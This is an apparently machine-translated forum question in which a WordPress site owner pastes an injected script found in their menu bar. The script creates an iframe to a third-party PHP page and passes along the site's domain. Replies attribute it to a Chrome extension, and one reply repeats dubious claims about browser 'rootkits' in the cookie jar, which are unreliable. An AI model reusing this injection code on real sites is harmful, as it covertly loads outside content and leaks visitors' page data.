你好,我的網站上有惡意腳本,我無法在任何地方找到它!Wordpress中的惡意腳本
我在檢查檢查,它返回:
<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div>
<div id="abrir_aba"></div>
<div class="handle"></div>
<script type="text/javascript">
var relatedUrl = document.domain;
var protocol = window.location.protocol;
var idadv = document.createElement("iframe");
with(idadv){
id = "idadv";
src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl;
scrolling = "no";
}
document.getElementById("menu-bar").appendChild(idadv);
</script>
<script type="text/javascript">
$("#menu-bar").slideReveal({
trigger: $(".handle"),
push: false,
position: "right",
width: 50,
show: function(slider, trigger){
$('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"});
},
hidden: function(slider, trigger){
$('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"});
},
});
</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url=www.websiteladies.com" scrolling="no"></iframe></div>
它坐落在我的wordpress的「菜單欄」,但我到處都找不到的東西!這樣,我的網站的SSL證書,使我的網站顯示爲我的客戶的INSECURE!我不能相信 !
這裏是網址:http://www.websiteladies.com
任何幫助嗎?
感謝您的信息,這是一個Chrome插件!不敢相信! – FrenchyNYC
@FrenchyNYC。不客氣。 Google Chrome瀏覽器是我最喜歡的瀏覽器,這很遺憾,但它非常容易受到基於JS的rootkit的影響。一年前,我在「cookie」罐子裏發現了其中的231個。我現在經常擦拭緩存和cookie jar,就像每週一次。 – Sparky256